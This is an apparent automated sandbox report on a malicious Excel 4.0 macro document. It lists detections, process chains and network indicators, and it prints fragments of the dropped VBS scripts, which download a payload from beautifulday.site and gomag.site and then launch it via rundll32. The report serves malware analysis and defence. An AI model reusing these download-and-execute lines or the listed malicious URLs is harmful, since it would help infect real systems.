Loading ...

Play interactive tourEdit tour

Analysis Report notif-5544.xls

Overview

General Information

Sample Name:notif-5544.xls
Analysis ID:289557
MD5:ae2a14caa5595ef02ec0ac2632940117
SHA1:f80b96e39c2ba53619156e24d1b3bee531869b97
SHA256:40a49d9211f7ea4b78bbfb8864967fbfa64231af26e0e4d572afa29c3b9fcbd2

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Launcher Generic
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 2492 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 1980 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 3056 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2332 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2704 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2688 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2924 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 3024 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2956 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BF68mQO.vbsJoeSecurity_VBSLauncherGenericYara detected VBS Launcher GenericJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Office product drops script at suspicious locationShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2032, TargetFilename: C:\Users\user\AppData\Local\Temp\IEODW20q.vbs

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Spreading:

    barindex
    Yara detected VBS Launcher GenericShow sources
    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BF68mQO.vbs, type: DROPPED

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\IEODW20q.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\wclW2.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\BF68mQO.vbsJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: global trafficDNS query: name: beautifulday.site
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.156.10:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.156.10:443

    Networking:

    barindex
    Potential malicious VBS script found (has network functionality)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: WFXl.OpenWFXl.Type = 1WFXl.Write OncPXR.ResponseBodyJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: WFXl.OpenWFXl.Type = 1WFXl.Write OncPXR.ResponseBodyJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: WFXl.SaveToFile "C:\Users\user\AppData\Local\Temp\WF2jvZZl.html",2WFXl.CloseExit ForEnd IfNextJump to dropped file
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: beautifulday.site
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
    Source: wscript.exe, 00000007.00000002.2111588687.0000000005627000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: wscript.exe, 00000007.00000002.2111588687.0000000005627000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2105131846.0000000005A4B000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
    Source: explorer.exe, 00000002.00000002.2095206551.0000000001DA0000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2222008164.0000000001CC0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2102143374.0000000001E20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2228784431.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: explorer.exe, 00000003.00000002.2223163969.00000000027E0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.2095032719.0000000001BC0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.2108845982.0000000001CA0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: wscript.exe, 00000007.00000002.2111588687.0000000005627000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://video.google.co.uk/?hl=en&tab=wv
    Source: wscript.exe, 00000007.00000002.2111588687.0000000005627000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: explorer.exe, 00000002.00000002.2095206551.0000000001DA0000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2222008164.0000000001CC0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2102143374.0000000001E20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2228784431.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://www.google.co.uk/history/optout?hl=en
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: http://www.google.co.uk/preferences?hl=en
    Source: wscript.exe, 00000007.00000002.2111588687.0000000005627000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: wscript.exe, 00000007.00000002.2111301433.0000000005440000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZA
    Source: wscript.exe, 00000007.00000003.2105186048.00000000047A1000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/
    Source: wscript.exe, 00000007.00000002.2108586140.0000000000116000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php
    Source: wscript.exe, 00000007.00000002.2108754909.00000000004DC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpR
    Source: wscript.exe, 00000007.00000002.2108754909.00000000004DC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpk
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2107187601.0000000003B35000.00000004.00000040.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpl
    Source: wscript.exe, 00000007.00000002.2108754909.00000000004DC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpy
    Source: wscript.exe, 00000007.00000002.2108754909.00000000004DC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php~
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
    Source: wscript.exe, 00000007.00000002.2108758556.00000000004E2000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.php
    Source: wscript.exe, 00000007.00000002.2108758556.00000000004E2000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.phpE
    Source: wscript.exe, 00000007.00000002.2108758556.00000000004E2000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.phplW2.vbs5
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: https://google.com/W
    Source: wscript.exe, 00000007.00000003.2105186048.00000000047A1000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
    Source: wscript.exe, 00000007.00000003.2105186048.00000000047A1000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
    Source: wscript.exe, 00000007.00000003.2105186048.00000000047A1000.00000004.00000001.sdmpString found in binary or memory: https://plusone.google.com/u/0
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: wscript.exe, 00000007.00000003.2105131846.0000000005A4B000.00000004.00000001.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://www.google.co.uk/finance?tab=we
    Source: wscript.exe, 00000007.00000003.2107116638.0000000004795000.00000004.00000001.sdmpString found in binary or memory: https://www.google.co.uk/intl/en/about/products?tab=wh
    Source: wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
    Source: wscript.exe, 00000007.00000003.2105131846.0000000005A4B000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2020/arati-sahas-80th-birthday-6753651837108548-2x.jpg
    Source: wscript.exe, 00000007.00000002.2109672261.0000000004754000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/q
    Source: wscript.exe, 00000007.00000003.2105186048.00000000047A1000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2105290743.0000000000547000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.2108810830.000000000054D000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2105131846.0000000005A4B000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/setprefdomain?prefdom=GB&prev=https://www.google.co.uk/&sig=K_A1G_4Pk
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: notif-5544.xlsInitial sample: WORKSPACE
    Microsoft Office drops suspicious filesShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\IEODW20q.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\wclW2.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\BF68mQO.vbsJump to behavior
    Potential malicious VBS script found (suspicious strings)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: RkxmIDg = Array(WS23y6,XMNFpy5J,Jp222QX,dX1d1b)Dim OncPXR: Set OncPXR = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: WuFASAt.Document.Application.ShellExecute "rundll32.exe","C:\Users\user\AppData\Local\Temp\WF2jvZZl.html,DllRegisterServer","C:\Windows\System32",Null,0Jump to dropped file
    Source: notif-5544.xlsOLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow title found: microsoft excel okthe workbook cannot be opened or repaired by microsoft excel because it is corrupt.
    Source: classification engineClassification label: mal96.spre.expl.evad.winXLS@16/10@2/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\4ADE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD104.tmpJump to behavior
    Source: notif-5544.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs'
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs'
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbs
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\IEODW20q.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\wclW2.vbsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\BF68mQO.vbsJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\IEODW20q.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wclW2.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\BF68mQO.vbs' Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
